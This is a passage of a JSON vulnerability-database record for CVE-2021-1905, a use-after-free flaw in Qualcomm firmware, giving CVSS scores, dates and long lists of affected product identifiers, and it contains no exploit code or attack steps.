"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T09:15:00", "type": "cve", "title": "CVE-2021-1905", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1905"], "modified": "2021-05-12T16:02:00", "cpe": ["cpe:/o:qualcomm:qca6595au_firmware:-", "cpe:/o:qualcomm:qsw8574_firmware:-", "cpe:/o:qualcomm:pm855_firmware:-", "cpe:/o:qualcomm:qdm5652_firmware:-", "cpe:/o:qualcomm:qualcomm215_firmware:-", "cpe:/o:qualcomm:sa6155p_firmware:-", "cpe:/o:qualcomm:sdxr2_5g_firmware:-", "cpe:/o:qualcomm:sd210_firmware:-", "cpe:/o:qualcomm:sd768g_firmware:-", "cpe:/o:qualcomm:sdw2500_firmware:-", "cpe:/o:qualcomm:qpm8895_firmware:-", "cpe:/o:qualcomm:pmi8952_firmware:-", "cpe:/o:qualcomm:qbt2000_firmware:-", "cpe:/o:qualcomm:pm8150a_firmware:-", "cpe:/o:qualcomm:qdm5677_firmware:-", "cpe:/o:qualcomm:mdm9206_firmware:-", "cpe:/o:qualcomm:qcc1110_firmware:-", "cpe:/o:qualcomm:sdr660_firmware:-", "cpe:/o:qualcomm:qdm2307_firmware:-", "cpe:/o:qualcomm:apq8096au_firmware:-", "cpe:/o:qualcomm:qdm5679_firmware:-", "cpe:/o:qualcomm:wcn6851_firmware:-", "cpe:/o:qualcomm:pm670a_firmware:-", "cpe:/o:qualcomm:qca9379_firmware:-", "cpe:/o:qualcomm:wsa8815_firmware:-", "cpe:/o:qualcomm:wcd9326_firmware:-", "cpe:/o:qualcomm:csra6620_firmware:-", "cpe:/o:qualcomm:qca6320_firmware:-", "cpe:/o:qualcomm:qpm4650_firmware:-", "cpe:/o:qualcomm:qca6696_firmware:-", "cpe:/o:qualcomm:pmk8350_firmware:-", "cpe:/o:qualcomm:wcn3950_firmware:-", "cpe:/o:qualcomm:qcs610_firmware:-", "cpe:/o:qualcomm:pm6125_firmware:-", "cpe:/o:qualcomm:qcs6125_firmware:-", "cpe:/o:qualcomm:qca6574au_firmware:-", "cpe:/o:qualcomm:smb358s_firmware:-", "cpe:/o:qualcomm:qfs2580_firmware:-", "cpe:/o:qualcomm:qpm6582_firmware:-", "cpe:/o:qualcomm:pmc1000h_firmware:-", "cpe:/o:qualcomm:qca4020_firmware:-", "cpe:/o:qualcomm:qat5568_firmware:-", "cpe:/o:qualcomm:qcs605_firmware:-", "cpe:/o:qualcomm:wcn3991_firmware:-", "cpe:/o:qualcomm:sd205_firmware:-", "cpe:/o:qualcomm:sda429w_firmware:-", "cpe:/o:qualcomm:qat3522_firmware:-", "cpe:/o:qualcomm:pm6250_firmware:-", "cpe:/o:qualcomm:qca6421_firmware:-", "cpe:/o:qualcomm:pm8004_firmware:-", "cpe:/o:qualcomm:rgr7640au_firmware:-", "cpe:/o:qualcomm:qfe4301_firmware:-", "cpe:/o:qualcomm:msm8996au_firmware:-", "cpe:/o:qualcomm:sdx55_firmware:-", "cpe:/o:qualcomm:pm670_firmware:-", "cpe:/o:qualcomm:qpa4361_firmware:-", "cpe:/o:qualcomm:qtc801s_firmware:-", "cpe:/o:qualcomm:qfe4309_firmware:-", "cpe:/o:qualcomm:wcd9330_firmware:-", "cpe:/o:qualcomm:qat5516_firmware:-", "cpe:/o:qualcomm:fsm10056_firmware:-", "cpe:/o:qualcomm:pm7150a_firmware:-", "cpe:/o:qualcomm:qln5020_firmware:-", "cpe:/o:qualcomm:sdx20_firmware:-", "cpe:/o:qualcomm:wcn3615_firmware:-", "cpe:/o:qualcomm:smb1381_firmware:-", "cpe:/o:qualcomm:wcd9340_firmware:-", "cpe:/o:qualcomm:apq8053_firmware:-", "cpe:/o:qualcomm:smb1350_firmware:-", "cpe:/o:qualcomm:qpm5641_firmware:-", "cpe:/o:qualcomm:sd730_firmware:-", "cpe:/o:qualcomm:qpm8820_firmware:-", "cpe:/o:qualcomm:sd720g_firmware:-", "cpe:/o:qualcomm:pm8937_firmware:-", "cpe:/o:qualcomm:pm8953_firmware:-", "cpe:/o:qualcomm:smb2351_firmware:-", "cpe:/o:qualcomm:qpa8673_firmware:-", "cpe:/o:qualcomm:qpm6621_firmware:-", "cpe:/o:qualcomm:wsa8830_firmware:-", "cpe:/o:qualcomm:pmi8998_firmware:-", "cpe:/o:qualcomm:sdr051_firmware:-", "cpe:/o:qualcomm:sd670_firmware:-", "cpe:/o:qualcomm:wtr2955_firmware:-", "cpe:/o:qualcomm:wcn3680_firmware:-", "cpe:/o:qualcomm:pmd9607_firmware:-", "cpe:/o:qualcomm:qfe4302_firmware:-", "cpe:/o:qualcomm:qln5040_firmware:-", "cpe:/o:qualcomm:qpa8821_firmware:-", "cpe:/o:qualcomm:qca6174a_firmware:-", "cpe:/o:qualcomm:pmm8155au_firmware:-", "cpe:/o:qualcomm:qtc800h_firmware:-", "cpe:/o:qualcomm:qfs2608_firmware:-", "cpe:/o:qualcomm:rsw8577_firmware:-", "cpe:/o:qualcomm:sdr8250_firmware:-", "cpe:/o:qualcomm:qfe4373fc_firmware:-", "cpe:/o:qualcomm:ar8035_firmware:-", "cpe:/o:qualcomm:pm7250b_firmware:-", "cpe:/o:qualcomm:qca6335_firmware:-", "cpe:/o:qualcomm:sd710_firmware:-", "cpe:/o:qualcomm:pmx20_firmware:-", "cpe:/o:qualcomm:qet4101_firmware:-", "cpe:/o:qualcomm:qpm4630_firmware:-", "cpe:/o:qualcomm:sd845_firmware:-", "cpe:/o:qualcomm:sd632_firmware:-", "cpe:/o:qualcomm:qpa6560_firmware:-", "cpe:/o:qualcomm:qpm5541_firmware:-", "cpe:/o:qualcomm:qdm2305_firmware:-", "cpe:/o:qualcomm:qpm5579_firmware:-", "cpe:/o:qualcomm:qpa5460_firmware:-", "cpe:/o:qualcomm:qpa8803_firmware:-", "cpe:/o:qualcomm:sdr8150_firmware:-", "cpe:/o:qualcomm:qfs2530_firmware:-", "cpe:/o:qualcomm:qpm6670_firmware:-", "cpe:/o:qualcomm:qpa5580_firmware:-", "cpe:/o:qualcomm:pm8350b_firmware:-", "cpe:/o:qualcomm:pmi632_firmware:-", "cpe:/o:qualcomm:qpm5870_firmware:-", "cpe:/o:qualcomm:smb1355_firmware:-", "cpe:/o:qualcomm:pmw3100_firmware:-", "cpe:/o:qualcomm:pm4125_firmware:-", "cpe:/o:qualcomm:aqt1000_firmware:-", "cpe:/o:qualcomm:pm8998_firmware:-", "cpe:/o:qualcomm:sm6250p_firmware:-", "cpe:/o:qualcomm:qat5515_firmware:-", "cpe:/o:qualcomm:qpm5577_firmware:-", "cpe:/o:qualcomm:sd678_firmware:-", "cpe:/o:qualcomm:pm7250_firmware:-", "cpe:/o:qualcomm:sa8150p_firmware:-", "cpe:/o:qualcomm:qfs2630_firmware:-", "cpe:/o:qualcomm:qca6436_firmware:-", "cpe:/o:qualcomm:qpm4641_firmware:-", "cpe:/o:qualcomm:smb231_firmware:-", "cpe:/o:qualcomm:qdm3301_firmware:-", "cpe:/o:qualcomm:sd429_firmware:-", "cpe:/o:qualcomm:pmr735b_firmware:-", "cpe:/o:qualcomm:sd750g_firmware:-", "cpe:/o:qualcomm:wcn3620_firmware:-", "cpe:/o:qualcomm:sd460_firmware:-", "cpe:/o:qualcomm:sa8155_firmware:-", "cpe:/o:qualcomm:wcn3660_firmware:-", "cpe:/o:qualcomm:sdxr1_firmware:-", "cpe:/o:qualcomm:wtr6955_firmware:-", "cpe:/o:qualcomm:pmd9655_firmware:-", "cpe:/o:qualcomm:wcn3660b_firmware:-", "cpe:/o:qualcomm:qln1020_firmware:-", "cpe:/o:qualcomm:qtc800t_firmware:-", "cpe:/o:qualcomm:qpm5679_firmware:-", "cpe:/o:qualcomm:sdr675_firmware:-", "cpe:/o:qualcomm:csra6640_firmware:-", "cpe:/o:qualcomm:pmm8996au_firmware:-", "cpe:/o:qualcomm:pm8350bh_firmware:-", "cpe:/o:qualcomm:wcd9375_firmware:-", "cpe:/o:qualcomm:qat3550_firmware:-", "cpe:/o:qualcomm:sd8c_firmware:-", "cpe:/o:qualcomm:pme605_firmware:-", "cpe:/o:qualcomm:pm8350_firmware:-", "cpe:/o:qualcomm:qat5533_firmware:-", "cpe:/o:qualcomm:sd662_firmware:-", "cpe:/o:qualcomm:sd870_firmware:-", "cpe:/o:qualcomm:smb1396_firmware:-", "cpe:/o:qualcomm:pm855b_firmware:-", "cpe:/o:qualcomm:qat5522_firmware:-", "cpe:/o:qualcomm:wcn6856_firmware:-", "cpe:/o:qualcomm:qpa5373_firmware:-", "cpe:/o:qualcomm:sa6150p_firmware:-", "cpe:/o:qualcomm:qpa8802_firmware:-", "cpe:/o:qualcomm:qtm525_firmware:-", "cpe:/o:qualcomm:pmr735a_firmware:-", "cpe:/o:qualcomm:qca8337_firmware:-", "cpe:/o:qualcomm:qfe4308_firmware:-", "cpe:/o:qualcomm:qca6310_firmware:-", "cpe:/o:qualcomm:qat3516_firmware:-", "cpe:/o:qualcomm:qca6564_firmware:-", "cpe:/o:qualcomm:qfe4305_firmware:-", "cpe:/o:qualcomm:qpm5621_firmware:-", "cpe:/o:qualcomm:pm8909_firmware:-", "cpe:/o:qualcomm:qpm8870_firmware:-", "cpe:/o:qualcomm:qdm2308_firmware:-", "cpe:/o:qualcomm:smr545_firmware:-", "cpe:/o:qualcomm:qtm527_firmware:-", "cpe:/o:qualcomm:sdr660g_firmware:-", "cpe:/o:qualcomm:qpa8842_firmware:-", "cpe:/o:qualcomm:wcn3610_firmware:-", "cpe:/o:qualcomm:qcs603_firmware:-", "cpe:/o:qualcomm:qln1030_firmware:-", "cpe:/o:qualcomm:qcs410_firmware:-", "cpe:/o:qualcomm:sa6155_firmware:-", "cpe:/o:qualcomm:pm660l_firmware:-", "cpe:/o:qualcomm:pm660_firmware:-", "cpe:/o:qualcomm:qpa8801_firmware:-", "cpe:/o:qualcomm:wcd9380_firmware:-", "cpe:/o:qualcomm:pmm855au_firmware:-", "cpe:/o:qualcomm:qpa2625_firmware:-", "cpe:/o:qualcomm:pmm6155au_firmware:-", "cpe:/o:qualcomm:qca6564au_firmware:-", "cpe:/o:qualcomm:sd8885g_firmware:-", "cpe:/o:qualcomm:wtr4905_firmware:-", "cpe:/o:qualcomm:qtc410s_firmware:-", "cpe:/o:qualcomm:qat3514_firmware:-", "cpe:/o:qualcomm:qpm2630_firmware:-", "cpe:/o:qualcomm:pm8150c_firmware:-", "cpe:/o:qualcomm:qpa5581_firmware:-", "cpe:/o:qualcomm:pm456_firmware:-", "cpe:/o:qualcomm:qdm5620_firmware:-", "cpe:/o:qualcomm:pmm8920au_firmware:-", "cpe:/o:qualcomm:qfe2550_firmware:-", "cpe:/o:qualcomm:pm660a_firmware:-", "cpe:/o:qualcomm:pm670l_firmware:-", "cpe:/o:qualcomm:wgr7640_firmware:-", "cpe:/o:qualcomm:qdm2310_firmware:-", "cpe:/o:qualcomm:wcd9370_firmware:-", "cpe:/o:qualcomm:qtc800s_firmware:-", "cpe:/o:qualcomm:sd439_firmware:-", "cpe:/o:qualcomm:smb1357_firmware:-", "cpe:/o:qualcomm:wcd9385_firmware:-", "cpe:/o:qualcomm:qpm6585_firmware:-", "cpe:/o:qualcomm:pmi8937_firmware:-", "cpe:/o:qualcomm:smb1398_firmware:-", "cpe:/o:qualcomm:qsm8250_firmware:-", "cpe:/o:qualcomm:qet5100m_firmware:-", "cpe:/o:qualcomm:smb1390_firmware:-", "cpe:/o:qualcomm:smb1351_firmware:-", "cpe:/o:qualcomm:qdm2301_firmware:-", "cpe:/o:qualcomm:pm8150b_firmware:-", "cpe:/o:qualcomm:qpm5875_firmware:-", "cpe:/o:qualcomm:pmx50_firmware:-", "cpe:/o:qualcomm:sd8cx_firmware:-", "cpe:/o:qualcomm:pmx24_firmware:-", "cpe:/o:qualcomm:pmm8195au_firmware:-", "cpe:/o:qualcomm:wtr2965_firmware:-", "cpe:/o:qualcomm:apq8017_firmware:-", "cpe:/o:qualcomm:pm8350c_firmware:-", "cpe:/o:qualcomm:pm855a_firmware:-", "cpe:/o:qualcomm:smr526_firmware:-", "cpe:/o:qualcomm:qca6584au_firmware:-", "cpe:/o:qualcomm:sd675_firmware:-", "cpe:/o:qualcomm:qpm5657_firmware:-", "cpe:/o:qualcomm:fsm10055_firmware:-", "cpe:/o:qualcomm:pm855p_firmware:-", "cpe:/o:qualcomm:qcm4290_firmware:-", "cpe:/o:qualcomm:apq8009_firmware:-", "cpe:/o:qualcomm:qca9367_firmware:-", "cpe:/o:qualcomm:qet6110_firmware:-", "cpe:/o:qualcomm:qcm6125_firmware:-", "cpe:/o:qualcomm:pm8250_firmware:-", "cpe:/o:qualcomm:sdx50m_firmware:-", "cpe:/o:qualcomm:qca6420_firmware:-", "cpe:/o:qualcomm:sd765_firmware:-", "cpe:/o:qualcomm:qsw8573_firmware:-", "cpe:/o:qualcomm:wcd9341_firmware:-", "cpe:/o:qualcomm:sdm830_firmware:-", "cpe:/o:qualcomm:qfe4320_firmware:-", "cpe:/o:qualcomm:wsa8810_firmware:-", "cpe:/o:qualcomm:qat3518_firmware:-", "cpe:/o:qualcomm:pm6150l_firmware:-", "cpe:/o:qualcomm:pmk8003_firmware:-", "cpe:/o:qualcomm:qcs4290_firmware:-", "cpe:/o:qualcomm:qat3555_firmware:-", "cpe:/o:qualcomm:qet6100_firmware:-", "cpe:/o:qualcomm:mdm9650_firmware:-", "cpe:/o:qualcomm:qpm5670_firmware:-", "cpe:/o:qualcomm:qca9377_firmware:-", "cpe:/o:qualcomm:qfe4303_firmware:-", "cpe:/o:qualcomm:qca6564a_firmware:-", "cpe:/o:qualcomm:sdr845_firmware:-", "cpe:/o:qualcomm:qdm5650_firmware:-", "cpe:/o:qualcomm:qdm5670_firmware:-", "cpe:/o:qualcomm:mdm9626_firmware:-", "cpe:/o:qualcomm:smr546_firmware:-", "cpe:/o:qualcomm:sd450_firmware:-", "cpe:/o:qualcomm:qpm4640_firmware:-", "cpe:/o:qualcomm:qet4100_firmware:-", "cpe:/o:qualcomm:qfe3100_firmware:-", "cpe:/o:qualcomm:wcn3990_firmware:-", "cpe:/o:qualcomm:sd835_firmware:-", "cpe:/o:qualcomm:wsa8835_firmware:-", "cpe:/o:qualcomm:smb1380_firmware:-", "cpe:/o:qualcomm:sdw3100_firmware:-", "cpe:/o:qualcomm:sd480_firmware:-", "cpe:/o:qualcomm:wcn3998_firmware:-", "cpe:/o:qualcomm:qdm4643_firmware:-", "cpe:/o:qualcomm:sa8155p_firmware:-", "cpe:/o:qualcomm:sdm630_firmware:-", "cpe:/o:qualcomm:qpa5461_firmware:-", "cpe:/o:qualcomm:qca6430_firmware:-", "cpe:/o:qualcomm:qca6174_firmware:-", "cpe:/o:qualcomm:sdr052_firmware:-", "cpe:/o:qualcomm:sdr735_firmware:-", "cpe:/o:qualcomm:qpa8686_firmware:-", "cpe:/o:qualcomm:qdm4650_firmware:-", "cpe:/o:qualcomm:apq8064au_firmware:-", "cpe:/o:qualcomm:wcd9360_firmware:-", "cpe:/o:qualcomm:sdr735g_firmware:-", "cpe:/o:qualcomm:wtr5975_firmware:-", "cpe:/o:qualcomm:qdm5671_firmware:-", "cpe:/o:qualcomm:smb1358_firmware:-", "cpe:/o:qualcomm:wcn6855_firmware:-", "cpe:/o:qualcomm:qat3519_firmware:-", "cpe:/o:qualcomm:qsm7250_firmware:-", "cpe:/o:qualcomm:pmx55_firmware:-", "cpe:/o:qualcomm:pm6350_firmware:-", "cpe:/o:qualcomm:qpm5620_firmware:-", "cpe:/o:qualcomm:sa8195p_firmware:-", "cpe:/o:qualcomm:sdr425_firmware:-", "cpe:/o:qualcomm:qpm8830_firmware:-", "cpe:/o:qualcomm:wcd9335_firmware:-", "cpe:/o:qualcomm:qdm2302_firmware:-", "cpe:/o:qualcomm:qcs2290_firmware:-", "cpe:/o:qualcomm:qbt1500_firmware:-", "cpe:/o:qualcomm:pm640a_firmware:-", "cpe:/o:qualcomm:pm3003a_firmware:-", "cpe:/o:qualcomm:sd888_firmware:-", "cpe:/o:qualcomm:wcn3999_firmware:-", "cpe:/o:qualcomm:ar8151_firmware:-", "cpe:/o:qualcomm:sdx24_firmware:-", "cpe:/o:qualcomm:sm4125_firmware:-", "cpe:/o:qualcomm:pm8005_firmware:-", "cpe:/o:qualcomm:sd636_firmware:-", "cpe:/o:qualcomm:qpa4360_firmware:-", "cpe:/o:qualcomm:sa2150p_firmware:-", "cpe:/o:qualcomm:sdm429w_firmware:-", "cpe:/o:qualcomm:sdr865_firmware:-", "cpe:/o:qualcomm:qet6105_firmware:-", "cpe:/o:qualcomm:qfe2520_firmware:-", "cpe:/o:qualcomm:wtr3925_firmware:-", "cpe:/o:qualcomm:sm6250_firmware:-", "cpe:/o:qualcomm:qcm2290_firmware:-", "cpe:/o:qualcomm:sd765g_firmware:-", "cpe:/o:qualcomm:sd855_firmware:-", "cpe:/o:qualcomm:sd455_firmware:-", "cpe:/o:qualcomm:qca6390_firmware:-", "cpe:/o:qualcomm:qfe3340_firmware:-", "cpe:/o:qualcomm:msm8909w_firmware:-", "cpe:/o:qualcomm:pm8150l_firmware:-", "cpe:/o:qualcomm:sm7250p_firmware:-", "cpe:/o:qualcomm:wcn3988_firmware:-", "cpe:/o:qualcomm:pm7150l_firmware:-", "cpe:/o:qualcomm:pm4250_firmware:-", "cpe:/o:qualcomm:qbt1000_firmware:-", "cpe:/o:qualcomm:sdx20m_firmware:-", "cpe:/o:qualcomm:pm439_firmware:-", "cpe:/o:qualcomm:pm855l_firmware:-", "cpe:/o:qualcomm:qpa4340_firmware:-", "cpe:/o:qualcomm:qfe2101_firmware:-", "cpe:/o:qualcomm:pm8009_firmware:-", "cpe:/o:qualcomm:sa515m_firmware:-", "cpe:/o:qualcomm:qdm5621_firmware:-", "cpe:/o:qualcomm:mdm9628_firmware:-", "cpe:/o:qualcomm:msm8953_firmware:-", "cpe:/o:qualcomm:smb1354_firmware:-", "cpe:/o:qualcomm:qpm6375_firmware:-", "cpe:/o:qualcomm:smr525_firmware:-", "cpe:/o:qualcomm:sd8655g_firmware:-", "cpe:/o:qualcomm:wcd9371_firmware:-", "cpe:/o:qualcomm:smb1395_firmware:-", "cpe:/o:qualcomm:qca6391_firmware:-", "cpe:/o:qualcomm:sd665_firmware:-", "cpe:/o:qualcomm:sd660_firmware:-", "cpe:/o:qualcomm:qln4650_firmware:-", "cpe:/o:qualcomm:sd6905g_firmware:-", "cpe:/o:qualcomm:qln4640_firmware:-", "cpe:/o:qualcomm:qet5100_firmware:-", "cpe:/o:qualcomm:wcn3680b_firmware:-", "cpe:/o:qualcomm:qsw6310_firmware:-", "cpe:/o:qualcomm:pm6150_firmware:-", "cpe:/o:qualcomm:qpm5658_firmware:-", "cpe:/o:qualcomm:pmk8002_firmware:-", "cpe:/o:qualcomm:apq8009w_firmware:-", "cpe:/o:qualcomm:sdx55m_firmware:-", "cpe:/o:qualcomm:pm8150_firmware:-", "cpe:/o:qualcomm:qpm6325_firmware:-", "cpe:/o:qualcomm:wcn3980_firmware:-", "cpe:/o:qualcomm:pm640p_firmware:-", "cpe:/o:qualcomm:sa6145p_firmware:-", "cpe:/o:qualcomm:pm215_firmware:-", "cpe:/o:qualcomm:qca6431_firmware:-", "cpe:/o:qualcomm:qpm5677_firmware:-", "cpe:/o:qualcomm:pm8008_firmware:-", "cpe:/o:qualcomm:qca6574a_firmware:-", "cpe:/o:qualcomm:qca6574_firmware:-", "cpe:/o:qualcomm:qln4642_firmware:-", "cpe:/o:qualcomm:pmr525_firmware:-", "cpe:/o:qualcomm:qln5030_firmware:-", "cpe:/o:qualcomm:ar8031_firmware:-", "cpe:/o:qualcomm:smb1360_firmware:-", "cpe:/o:qualcomm:msm8917_firmware:-", "cpe:/o:qualcomm:qpa8675_firmware:-", "cpe:/o:qualcomm:mdm9607_firmware:-", "cpe:/o:qualcomm:pm640l_firmware:-", "cpe:/o:qualcomm:pm6150a_firmware:-", "cpe:/o:qualcomm:qcs405_firmware:-", "cpe:/o:qualcomm:wcn6850_firmware:-", "cpe:/o:qualcomm:qpm4621_firmware:-", "cpe:/o:qualcomm:qca6426_firmware:-", "cpe:/o:qualcomm:wcn3910_firmware:-", "cpe:/o:qualcomm:pm8916_firmware:-"], "id": "CVE-2021-1905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1905", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:qualcomm:wcn3680_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5581_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4308_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8053_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd210_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6420_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2520_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9370_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6110_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb2351_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa6560_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6431_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx24_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd636_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmd9655_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9380_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm4643_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9335_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8cx_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2530_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw8573_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd480_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:rsw8577_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6174a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5516_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1395_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr425_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3518_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5657_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm6250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6155p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8195p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr546_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8035_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5541_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx20m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs4290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9371_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs2290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3990_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4373fc_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4642_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8821_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8005_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4320_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800h_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5373_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx55_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc801s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8920au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1380_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx55_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr8150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdw2500_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6582_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9341_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8810_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5875_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet5100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3910_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5568_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet5100m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmc1000h_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5671_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8909_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8842_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8096au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6585_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt2000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3615_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8004_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr5975_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8008_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7150l_firmware:-:*:*:*:*:*:*:*", 